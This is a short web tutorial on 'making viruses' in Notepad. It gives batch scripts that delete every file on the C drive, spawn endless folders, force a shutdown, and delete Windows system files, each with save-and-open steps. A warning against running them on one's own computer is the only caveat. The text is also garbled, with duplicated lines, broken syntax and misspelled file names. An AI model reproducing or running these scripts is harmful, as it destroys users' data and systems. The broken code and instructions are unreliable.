How to Make virus ????
--------------------------------------------------------------------------------
Delete C Drive Files
1. Open Notepad and copy below code into
{ @Echo off
Del C:\ *.* |y }
Del C:\ *.* |y }
2. Save file as virus.bat
3. Open this file will delete all files of the C Drive.
3. Open this file will delete all files of the C Drive.
Warning: Please don't try to run on your own computer
--------------------------------------------------------------------------------
Make Thousands of Folder Using Notepad
1. Open notepad and copy the following code
@echo off
:top
md %random%
goto top
2. Save it as Folder.bat
3. Now, Open this file
Warning: Please don't try to run on your own computer
--------------------------------------------------------------------------------
Shutdown Virus
1. Open notepad and copy the following code
@echo off
Shutdown -s -t “30”
2. Save it as Shutdown.bat
3. Now, Open this file
Warning: Please don't try to run on your own computer
--------------------------------------------------------------------------------
Make Danger Virus That can Damage PC Using
Make Danger Virus That can Damage PC Using
Notepad
Notepad
1. Open notepad and copy the following code
@echo off
del "c:\windows\pchealth"
del "c:\windows\system"
del "c:\windows\system32\restore"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\ntoskrni.exe"
del "c:\winlogon.exe"
2. Save as lo1cal.bat.
del "c:\windows\pchealth"
del "c:\windows\system"
del "c:\windows\system32\restore"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\ntoskrni.exe"
del "c:\winlogon.exe"
2. Save as lo1cal.bat.